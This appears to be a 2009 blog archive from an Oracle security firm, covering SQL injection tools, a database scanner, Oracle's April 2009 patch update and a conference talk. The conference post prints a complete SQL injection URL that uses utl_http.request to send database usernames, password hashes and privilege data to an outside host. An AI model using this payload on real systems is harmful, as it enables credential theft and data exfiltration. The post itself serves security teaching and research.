SQL Injection Tool Pangolin 2.0 published

April 16th, 2009

The SQL Injection Tool Pangolin is now available in version 2.0.  I already talked about this SQL Injection tool in a previous blog entry.

Pangolin is now available in different versions. The free version does no longer support Oracle, MySQL, DB2, Postgres, Sybase, …  That’s why I can not provide an updated video of Pangolin.

The Standard edition with Oracle support costs 200 USD. For 8000 USD you will get the Enterprise Edition including sourcecode. I guess the new version does no longer contain a backdoor…

Oracle Database Scanner Repscan 2.5 trial available

April 15th, 2009

We just finished the latest version of our  Oracle database scanner Repscan 2.5. You can download a trial version of Repscan from our exclusive distributor and partner Sentrigo.

Here some of the Repscan highlights:

  • Scan 1 or 100 databases in 1 run
  • GUI and/or commandline interface
  • Repscan client runs on Windows, Mac OSX and Linux
  • Advanced multi-threading password plugin architecture
  • Password plugins for Oracle DES, Oracle SHA1, MD4, MD5, SHA1, APEX3
  • Checks Database, History, Roles, HTMLDB 1.4-1.6, APEX 2.0-3.2, OID, OVS passwords
  • Optimized dictionary files
  • Shows the patch level of all your databases in one-click
  • Finds security problems such as unsecure code, SQL Injections, hard coded passwords, deprecated functions
  • Detects altered data via SHA2 checksums (including modifications of privilege and user tables)
  • Complements and integrates with Sentrigo’s Hedgehog family of database activity monitoring software

Link Repscan Trial

Oracle Critical Patch Update April 2009 (CPUApr2009) is out

April 14th, 2009

Oracle just released the April 2009 CPU.The database part of this Critical Patch Update (CPU) contains fixes for 16 security vulnerabilities in the Oracle database. 2 of the Oracle database vulnerabilities (Cluster Services, TNS Listener) are remote exploitable without authentication. The highest CVSS base score is 9.0 is a bug in the resource manager (Oracle 9.2 only) and requires create session privileges only.

This time Oracle has fixed 3 of our vulnerabilities (2 times SQL Injection in Oracle Advanced Queuing, Apex). The description from Oracle concerning the APEX problem is not correct. To access the APEX password hashes  there is no need for an APEX development user. A simple database user with create session is sufficient.

12 researchers are mentioned in this oracle advisory (2 from Red-Database Security (Franz Hüll and Alexander Kornbrust). The usual suspects (Esteban, Joxean and David) are part of the reporters again.

The most critical Oracle security bug (CVE-2009-0979) affects the Resource Manager in Oracle 9.2.

The following database components are affected:

  • Advanced Queuing
  • Application Express
  • Cluster Ready Services
  • Core RDBMS
  • Database Vault
  • Listener
  • Password Policy
  • Resource Manager
  • SQLX Functions
  • Workspace Manager

Red-Database-Securit released 3 advisories (SQL Injection in dbms_aqin, SQL Injection in dbms_aqadm_sys and unprivileged DB users can see APEX password hashes)

More details from the rest of this CPU, patches, exploits, …will be released within the next days.


IT Underground Prague – Presentation

März 27th, 2009

Just back from the IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.

Here a short example from the presentation:

The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).

http://victim.com/order.jsp?id=17‚ or 1=((select sum(length(utl_http.request(‚http://www.orasploit.com/’username||’=’||password) from dba_users)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’owner||’=’||table_name) from dba_tables)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’owner||’=’||table_name||’=’||column_name)) from dba_users))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’grantee||’=’||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||grantable) from dba_tab_privs)))–

More details in the presentation.

Web Application Testing with Pangolin (Video & Screenshot)

März 5th, 2009

Here is another new video “Web Application Testing with Pangolin” (1024×768).

Similar to the previous video with Matrixay I am using a chinese tool called Pangolin to extract the structure and content of a database (tables, columns, data) via a SQL Injection vulnerability in one of my vulnerable test applications.

Pangolin is a free product but some of the versions of Pangolin on the web are coming with a backdoored libcurl.dll. This can be a dangerous side effect of using free tools in a company environment. You have been warned…

Sometimes it is difficult to find a download possibility of Pangolin because the main website www.nosec.org is currently under construction but if you search a little bit you will be able to find a copy (e.g. via rapidshare). More details concerning Pangolin is available here.

Pangolin Web SQL Injection Tool

Pangolin supports all kind of databases (Oracle, MSSQL, MySQL, Sybase, DB2, …).

More videos can be found in our video section.